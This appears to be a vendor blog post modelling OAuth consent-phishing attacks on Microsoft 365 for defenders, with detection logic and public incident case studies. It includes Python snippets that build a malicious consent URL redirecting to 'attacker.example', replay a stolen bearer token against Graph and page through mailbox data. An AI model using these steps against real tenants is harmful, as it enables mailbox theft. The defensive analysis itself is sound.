Microsoft 365 OAuth Consent Defense: Overview / Threat Model

OAuth consent phishing against Microsoft 365 — what happens when no password is stolen

The whole attack in one paragraph

The attacker registers an application in a tenant they control. Microsoft does not charge for app registrations, so the cost of entry is zero. They give it a plausible display name ("Document Reader", "Team Calendar Sync", or a straight-up impersonation of a real vendor), set it to multi-tenant, and declare the Microsoft Graph scopes they want. Mail read. Files read. Maybe offline_access to get a refresh token. They construct an authorization URL pointing at login.microsoftonline.com, embed it in a phishing lure, and send it. The victim clicks. The victim authenticates to Microsoft normally, the same SSO experience they have a hundred times a day, real green padlock, every certificate valid. The consent prompt renders, listing the app name and the requested permissions in plain English. The victim clicks Accept. Microsoft issues access and refresh tokens, signed by Microsoft, scoped to the victim's account, the refresh token valid for up to 90 days. The attacker pastes the access token into their own client and starts calling Microsoft Graph from their own infrastructure. They read mail. They download files. They enumerate the directory. No password was stolen. No MFA prompt fired. From the SOC's point of view, nothing about the authentication was anomalous, because nothing about the authentication was anomalous. Everything that mattered happened during authorization, in a different table that most detection logic never looks at.

That is the attack. It is shorter than the AiTM kill chain and nastier in one specific way: the access path is signed by Microsoft, so every defensive control built around credential theft and session integrity sits to one side of it.

Why your AiTM playbook does not catch this

If you have spent the last two years hardening against AiTM phishing (FIDO2, CAE, Token Protection, impossible-travel rules), almost none of it applies here. The reasons:

  • Phish-resistant MFA does not help. The user is not being phished for credentials. They are being phished for consent. The MFA satisfies normally on the real Microsoft endpoint. FIDO2, CAE, Token Protection, none of them gate the consent prompt.
  • Conditional Access does not fire. CA evaluates sign-in. Sign-in is legitimate. The consent click happens after CA has already passed the session through. CA-03 (auth context for sensitive admin operations) can require step-up for admin consent, but standard user consent is invisible to CA.
  • Impossible travel does not fire. The user logs in from their normal location. The attacker calls Graph from their own infrastructure. Those are two different identities to the SIEM: the user's interactive sign-in is in SigninLogs, the attacker's Graph activity is in AADServicePrincipalSignInLogs. The SP-context activity does not correlate with user geography.
  • No "suspicious login" lights up because there was no suspicious login. The consent event itself is what matters, and most SOC detection logic was not built to fire on consent events.
  • Tokens are bearer credentials. Once issued, the access token works from any IP, any user-agent, any tenant. There is no device binding by default for delegated tokens. The attacker does not need to spoof anything about the user's device.
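That last bullet is worth making concrete. Here is a minimal sketch (Python standard library only; the token value is a hypothetical placeholder) of everything a client needs to replay a captured delegated token against Graph:

```python
import urllib.request

GRAPH = "https://graph.microsoft.com/v1.0"

def graph_request(access_token: str, path: str) -> urllib.request.Request:
    """Build a Graph call from a bearer token. Note what is absent:
    no password, no MFA assertion, no device claim. The Authorization
    header is the entire proof of identity."""
    return urllib.request.Request(
        f"{GRAPH}{path}",
        headers={"Authorization": f"Bearer {access_token}"},
    )

# Works identically from any IP, any user agent, any machine:
req = graph_request("eyJ0eXAiOiJKV1Qi...", "/me/messages?$top=999")
```

Nothing in the request ties it to the victim's device, which is why "revoke sessions and rotate the password" does not cut off access.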

This is the gap. The five detections in this bundle are built specifically to close it. Detection 01 fires on the consent moment itself. The other four fire on what the attacker does afterward: signing in to call Graph, adding a credential to the app for persistence, reading mail in volume. Each is a different point in the kill chain.

What gets captured at each stage

We mapped this end-to-end. Eight stages, each with the artifact a defender can see.

Stage 1. App registration in attacker tenant. Adversary registers a multi-tenant app in a tenant they control. Display name impersonates something legitimate. Logo is whatever they want. Publisher verification is usually absent rather than faked (faking it requires abusing the partner vetting process, as the December 2022 incident below shows), and that absence is itself one of the highest-fidelity signals available; detection 01 keys on it. Defender-visible artifact: none. This happens in the adversary's tenant, not yours.

Stage 2. Scope declaration. The app declares the OAuth scopes it will request. For mail collection: Mail.Read or Mail.ReadWrite, often with offline_access for the refresh token. For file collection: Files.Read.All, Files.ReadWrite.All, Sites.Read.All. For directory recon: User.Read.All, Group.Read.All, Directory.Read.All. For persistence (rare, requires admin consent): Application.ReadWrite.All, AppRoleAssignment.ReadWrite.All. Defender-visible artifact: none until consent is attempted.
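The tiers above translate directly into a classification table a detection can key on. A sketch (the tier labels are ours; the scope strings are the real Graph permission names listed in the stage above):

```python
# Tier labels are illustrative; scope strings are real Graph permissions.
SCOPE_TIERS = {
    "mail":        {"Mail.Read", "Mail.ReadWrite"},
    "files":       {"Files.Read.All", "Files.ReadWrite.All", "Sites.Read.All"},
    "directory":   {"User.Read.All", "Group.Read.All", "Directory.Read.All"},
    "persistence": {"Application.ReadWrite.All", "AppRoleAssignment.ReadWrite.All"},
}

def classify(requested):
    """Map a requested scope list onto the tiers, and note whether a
    refresh token (offline_access) was asked for alongside."""
    requested = set(requested)
    tiers = {name for name, scopes in SCOPE_TIERS.items() if scopes & requested}
    return tiers, "offline_access" in requested

tiers, wants_refresh = classify(["Mail.Read", "offline_access"])
```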

Stage 3. Construct the consent URL. URL is https://login.microsoftonline.com/{tenant}/oauth2/v2.0/authorize?... with tenant=common so any user in any tenant gets funneled through. URL-reputation, sandbox detonation, lookalike-domain detection, none of it applies. The URL points at genuine Microsoft infrastructure.
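The construction is trivial, which is part of the problem. A sketch (the client_id and redirect_uri values are placeholders):

```python
from urllib.parse import urlencode

def consent_url(client_id, redirect_uri, scopes, tenant="common"):
    """Build the authorize URL. Every byte of the host and path is
    genuine Microsoft infrastructure; only client_id points back to
    the attacker's app registration."""
    params = {
        "client_id": client_id,
        "response_type": "code",
        "redirect_uri": redirect_uri,
        "scope": " ".join(scopes),
    }
    return (f"https://login.microsoftonline.com/{tenant}"
            f"/oauth2/v2.0/authorize?{urlencode(params)}")

url = consent_url("11111111-2222-3333-4444-555555555555",
                  "https://attacker.example/callback",
                  ["Mail.Read", "offline_access"])
```

There is nothing for URL reputation to score: the host, path, and certificate are Microsoft's.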

Stage 4. Delivery. Email, Teams external chat, LinkedIn message, watering-hole compromise, replies on partners' sites. The lure is whatever gets the click. Standard email and Teams telemetry. Not the focus of this bundle.

Stage 5. User authentication and consent. This is the moment. The user clicks, authenticates normally to Microsoft, MFA satisfies. The consent prompt renders: app name, logo, publisher status, permission list in plain English. User clicks Accept. Two rows land in the logs: an AuditLogs event with OperationName == "Consent to application" carrying the AppId, AppDisplayName, scopes, ConsentType (User vs AllPrincipals), and the consenting user, plus a sign-in row in SigninLogs for the auth that preceded consent. Detection 01 fires here, before a single email has been read.
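Detection 01's logic can be sketched as a score across the markers the consent event carries. This is a simplification, not the shipped query: the field names and weights below are illustrative, not the raw AuditLogs schema.

```python
HIGH_IMPACT = {"Mail.Read", "Mail.ReadWrite", "Files.Read.All",
               "Files.ReadWrite.All", "Sites.Read.All", "Directory.Read.All"}

def score_consent(event):
    """Score one 'Consent to application' event. `event` is a
    simplified dict standing in for the audit row; weights are ours."""
    scopes = set(event["scopes"])
    score = 0
    score += 2 * len(scopes & HIGH_IMPACT)           # high-impact Graph scopes
    score += 2 if "offline_access" in scopes else 0  # refresh token requested
    score += 3 if not event.get("verified_publisher") else 0
    score += 3 if event.get("consent_type") == "AllPrincipals" else 0
    return score
```

Scoring across several markers at once is what keeps the detection alive when any single signal (publisher status, say) is compromised.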

Stage 6. Token issuance. Microsoft returns an access token (60 to 90 minute default) and, if offline_access was requested, a refresh token (up to 90 days, rolling). Both are bearer credentials. They contain claims for tenant ID, object ID, granted scopes, and audience. They do not by default carry device or proof-of-possession claims. No additional audit row fires beyond the consent event itself. Token issuance is invisible.
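You can see those claims, and the missing device binding, by decoding the token payload (decoding, not validating: the signature check is deliberately skipped in this sketch). The demo token below is self-constructed with illustrative claim values, not a real Microsoft token.

```python
import base64, json

def jwt_claims(token: str) -> dict:
    """Decode the middle (payload) segment of a JWT without verifying
    the signature -- enough to inspect claims, never to trust them."""
    payload = token.split(".")[1]
    payload += "=" * (-len(payload) % 4)   # restore stripped base64 padding
    return json.loads(base64.urlsafe_b64decode(payload))

# Demo token with illustrative claim values:
claims = {"tid": "victim-tenant-id", "oid": "victim-object-id",
          "scp": "Mail.Read offline_access", "aud": "https://graph.microsoft.com"}
body = base64.urlsafe_b64encode(json.dumps(claims).encode()).rstrip(b"=").decode()
demo = f"fakeheader.{body}.fakesignature"
```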

Stage 7. Adversary calls Microsoft Graph. With the access token, the attacker pulls mail (GET /me/messages?$top=999), enumerates files (GET /me/drive/root/children), reads directory data (GET /users, GET /groups). Calls authenticate as the user but the source IP is the attacker's, the user-agent is whatever client they are using, and the call volume is unlike any real user. Defender-visible artifacts: AADServicePrincipalSignInLogs for the SP-context sign-ins, AADNonInteractiveUserSignInLogs for token-refresh activity, CloudAppEvents (Defender for Cloud Apps) for object-level Graph reads, OfficeActivity for Exchange / SharePoint operations. Detections 03 and 05 fire here.
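The bulk pull is mechanically simple: follow @odata.nextLink until it stops appearing. A sketch with the fetch function injected, so nothing here touches the network:

```python
def drain(fetch, url):
    """Collect every item behind a paginated Graph endpoint. `fetch`
    is any callable that returns the parsed JSON page for a URL --
    injected here so the sketch stays offline."""
    items = []
    while url:
        page = fetch(url)
        items.extend(page.get("value", []))
        url = page.get("@odata.nextLink")   # absent on the last page
    return items
```

Three lines of loop body are the whole of "mail exfiltration via Graph" once the token exists; the only defender-visible trace is the volume.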

Stage 8. Optional: persistence via credential addition. If the consenting user holds a directory role (Application Administrator, Cloud Application Administrator, Global Admin), or if the tenant misconfigured app management for standard users, the attacker can add a client secret or certificate to the app. This converts delegated access (dependent on the user) into app-only access (independent of any user). Even if the original consent gets revoked, the credential keeps working against the SP. Defender-visible artifacts in AuditLogs with OperationName matching "Add service principal credentials", "Update application – Certificates and secrets management", or "Add owner to application". Detection 04 fires here, and the join against the prior 72 hours of consent events is what makes it high-fidelity: a credential add on a freshly consented app is the canonical T1098.001 persistence signature.
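The 72-hour join reduces to: for each credential-add, was there a consent to the same AppId in the window before it? A sketch over simplified (timestamp, AppId) event tuples, not the real audit rows:

```python
from datetime import datetime, timedelta

def credential_add_alerts(consents, cred_adds, window=timedelta(hours=72)):
    """Flag credential-add events landing within `window` after the
    earliest consent to the same AppId -- the T1098.001 signature."""
    first_consent = {}
    for ts, app_id in consents:
        if app_id not in first_consent or ts < first_consent[app_id]:
            first_consent[app_id] = ts
    return [(ts, app_id) for ts, app_id in cred_adds
            if app_id in first_consent
            and timedelta(0) <= ts - first_consent[app_id] <= window]

# Demo: one fresh consent, one credential add inside the window,
# one well outside it.
t0 = datetime(2024, 1, 1, 9, 0)
alerts = credential_add_alerts(
    consents=[(t0, "app-evil")],
    cred_adds=[(t0 + timedelta(hours=5), "app-evil"),
               (t0 + timedelta(hours=100), "app-evil")],
)
```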

Why this is harder than AiTM

AiTM takes a credential plus a session cookie. The cookie has a finite lifetime and lives on devices the defender mostly understands. CAE can revoke it in seconds. Token Protection can bind it to the device. The remediation playbook is well-understood: revoke sessions, force re-auth, the user is back to a clean state.

OAuth consent is different. The credential the attacker holds is signed by Microsoft, not by your tenant. It has a lifetime measured in months, not hours. CAE does not revoke it because CAE acts on user sessions, not on app-bound delegated tokens. The remediation requires explicit consent revocation plus SP disablement plus refresh-token revocation, in that order, and a SOC that runs credential-rotation-on-autopilot will rotate the user's password, declare the incident closed, and leave the OAuth grant in place. The attacker keeps reading mail.
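That ordered remediation can be pinned down as data. The endpoint paths below are the standard Microsoft Graph ones for each step; the placeholder IDs ({grantId} and so on) are illustrative.

```python
# Ordered remediation for an OAuth consent compromise. Note what is
# NOT on the list: rotating the user's password, which leaves the
# grant (and the attacker's tokens) fully alive.
REMEDIATION_ORDER = [
    ("revoke the consent grant", "DELETE",
     "/v1.0/oauth2PermissionGrants/{grantId}"),
    ("disable the service principal", "PATCH",
     "/v1.0/servicePrincipals/{spId}"),   # body: {"accountEnabled": false}
    ("revoke the user's refresh tokens", "POST",
     "/v1.0/users/{userId}/revokeSignInSessions"),
]
```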

The defensive answer is to fire on the consent event itself, and to make the consent event hard to obtain in the first place. That is what the rest of this bundle is for.

Mapped to ATT&CK

  • T1528. Steal Application Access Token. The consent grant itself.
  • T1550.001. Use Alternate Authentication Material: Application Access Token. Token use against Microsoft Graph.
  • T1098.001. Account Manipulation: Additional Cloud Credentials. Persistence via client secret or certificate added to the app.
  • T1098.003. Account Manipulation: Additional Cloud Roles. Role escalation by granting the app additional permissions.
  • T1078.004. Valid Accounts: Cloud Accounts. Account abuse during the access window.
  • T1114.002. Email Collection: Remote Email Collection. Mail exfiltration via Graph.
  • T1213.002. Data from Information Repositories: SharePoint. File exfiltration via Graph.

Detection 01 covers T1528. Detections 03 and 05 cover T1550.001 and T1114.002. Detection 04 covers T1098.001 and T1098.003. The hardening section covers prevention for all of them.

Four real incidents that prove the surface

We pulled four publicly documented incidents because each anchors a different point on the threat surface. A SOC analyst triaging a hit from one of the detections in this bundle should imagine these.

Google Docs OAuth worm (May 2017). A worm spread across Gmail in roughly one hour, hitting approximately one million users. The attacker registered an OAuth application called "Google Docs", visually indistinguishable from the real Google Docs in the consent prompt. Recipients saw what looked like a normal document share invitation from someone they actually knew. Click, consent, and the application immediately used the granted send-mail permission to forward itself to every contact in the victim's address book. Google killed it within an hour of public detection. Detection 02 (mass consent campaign) is calibrated specifically for this signature: five distinct users in the same tenant consenting to the same AppId within an hour. The 5/hour threshold catches this. The user-consent-restricted-to-verified-publishers control would have prevented it outright.
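Detection 02's threshold logic reduces to a sliding count of distinct consenting users per AppId. A sketch of that logic, not the shipped query (the 5-per-hour parameters mirror the calibration described above; the event shape is simplified):

```python
from datetime import datetime, timedelta
from collections import defaultdict

def mass_consent_apps(events, threshold=5, window=timedelta(hours=1)):
    """Flag any AppId that collects `threshold` distinct consenting
    users inside one sliding window -- the worm signature. Events are
    (timestamp, app_id, user) tuples."""
    by_app = defaultdict(list)
    for ts, app_id, user in events:
        by_app[app_id].append((ts, user))
    flagged = set()
    for app_id, rows in by_app.items():
        rows.sort()
        for t0, _ in rows:
            users = {u for t, u in rows if t0 <= t < t0 + window}
            if len(users) >= threshold:
                flagged.add(app_id)
                break
    return flagged

# Demo: five users consent to one app inside 25 minutes; a benign app
# collects a single consent.
start = datetime(2024, 1, 1, 10, 0)
demo = [(start + timedelta(minutes=5 * i), "evil-app", f"user{i}") for i in range(5)]
demo += [(start, "ok-app", "alice")]
flagged = mass_consent_apps(demo)
```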

Verified-publisher abuse (December 2022). Threat actors fraudulently impersonated legitimate companies during enrollment in the Microsoft Cloud Partner Program, then used those fraudulent partner accounts to apply the verified-publisher attestation to OAuth applications they registered. The applications appeared in the consent prompt with the blue "verified publisher" badge, the very signal Microsoft added so users could trust which apps were legitimate. The campaign primarily targeted UK and Ireland tenants and exfiltrated mailbox content. This is the proof that publisher gating alone is not enough. Detection 01 fires on high-impact scopes regardless of publisher status, specifically because of this incident. The recommendation in the mitigations post (pair publisher gating with permission-classification gating) closes exactly this gap.

Midnight Blizzard / NOBELIUM intrusion into Microsoft (January 2024). Russia's SVR compromised Microsoft corporate systems via a multi-stage path that ended in OAuth abuse. Initial access was a password spray against a legacy non-production test tenant account that had no MFA. From that foothold, the actor identified a legacy test OAuth application that already held elevated permissions in the corporate environment, granted it the full_access_as_app Office 365 Exchange Online application role, and used the OAuth-app-bound permissions to read mailboxes belonging to Microsoft senior leadership, the cybersecurity team, and the legal team. This is the high end of the threat model. APT-grade actor combining account compromise with OAuth-app abuse for tenant-wide blast radius. Detection 04 (credential addition) catches the role-grant step. Detection 03 (SP anomalous sign-in) catches the dormancy break: the legacy test app had been silent in production use, and a break in dormancy is exactly what the detection keys on. The audit script Get-RiskyConsentGrants.ps1 would have surfaced the legacy app pre-incident; its risk score is tuned to elevate exactly this category of stale-but-powerful SP.

Criminal OAuth spam abuse (September 2022). Microsoft published an investigation into financially-motivated actors using malicious OAuth applications as a delivery vector for cloud-based email spam. Pattern: compromise a user account via credential stuffing against accounts without MFA, use the compromised account to consent to a malicious OAuth app, grant it send-mail permissions, then send large spam volumes from the tenant's legitimate Exchange infrastructure. Two operational benefits for the attacker: it survived password resets of the compromised users (the OAuth app held the access independently), and it used the tenant's reputation to send mail rather than the attacker's. This is the commodity end of the threat. Detection 03 fires as the malicious SP signs in from spam-sending hosting infrastructure. Detection 04 fires on the persistence step. The IR runbook in this bundle calls out explicitly: revoke consent grants and disable the SP (not just reset the user's password) because SOCs that ran credential-rotation-only on this campaign discovered the SP continued to operate.

What these four incidents teach together

A few patterns recur across all four:

  • Consent is durable. In every incident, the attacker's foothold survived events that would have remediated a password-only compromise: password rotations, MFA enrollments, even tenant-wide forced sign-outs in some cases. Consent revocation is the unique remediation for this class of attack. SOCs that do not have it in their playbook miss the persistence.
  • Trust signals are mutable. The Verified Publisher campaign proved that the strongest signal Microsoft offered to users (the blue "verified publisher" badge) was abusable when the upstream vetting process had a flaw. Detections that depend on a single signal degrade catastrophically when that signal is compromised. Detection 01 scores across multiple markers for exactly this reason.
  • Scale spans five orders of magnitude. Google Docs hit roughly a million users in an hour. Midnight Blizzard hit low tens of accounts at a single high-value target. The same technique class spans both. Detection 02 is calibrated for the worm end of the spectrum; detections 03 and 04 are calibrated for the targeted end. A SOC needs both, layered.
  • Audit cadence is the missing link. In the Midnight Blizzard case, the legacy test app had been sitting in production for years with elevated permissions and no review. Get-RiskyConsentGrants.ps1 is built specifically to surface exactly that profile. The control is doing the audit, not buying the tool; the tool just makes the audit cheap.

These are the reasons each piece of the bundle exists. Read the detection post next: it walks through the queries that fire on each of these stages, with the false-positive analysis you will need before deploying.

Want a tabletop on your tenant’s OAuth exposure?

We run two-hour tabletop sessions on what an attacker can do with a captured M365 admin account, which consent-framework settings you have versus need, and what to roll out in what order. Fixed price.
